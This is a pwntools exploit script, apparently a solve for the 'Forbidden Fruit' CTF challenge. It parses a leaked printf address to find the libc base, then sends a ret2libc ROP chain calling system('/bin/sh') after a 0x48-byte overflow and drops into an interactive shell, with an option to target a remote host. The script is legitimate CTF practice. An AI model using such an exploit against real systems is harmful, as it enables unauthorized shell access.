The Forbidden Fruit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

context.terminal = "tmux neww -a".split()

exe = context.binary = ELF(args.EXE or "./chall_patched")
libc = ELF("/home/hknhmr/ctf/2025/perfectroot/pwn/forbidden-fruit/chall(4)-1/libc6.so")
assert libc is not None


def start(argv=[], *a, **kw):
    if args.REMOTE:
        # parse things of this format 83.136.254.84:36100
        addr, port = args.REMOTE.split(":")
        return remote(addr, int(port))
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)


gdbscript = """
bp 0x000000000040120a
continue
""".format(**locals())

io = start()
sla = io.sendlineafter
sa = io.sendafter
sl = io.sendline
ru = io.recvuntil
rl = io.recvline

ru(b": ")
printf_addr = int(rl().strip(), 16)
libc.address = printf_addr - libc.sym["printf"]

rop = ROP(libc)
rop.raw(rop.ret)
rop.call("system", [next(libc.search(b"/bin/sh\x00"))])

info(rop.dump())
info("%#x" % libc.address)

io.flat({0x48: bytes(rop)})
io.flat(b"\n")

io.interactive()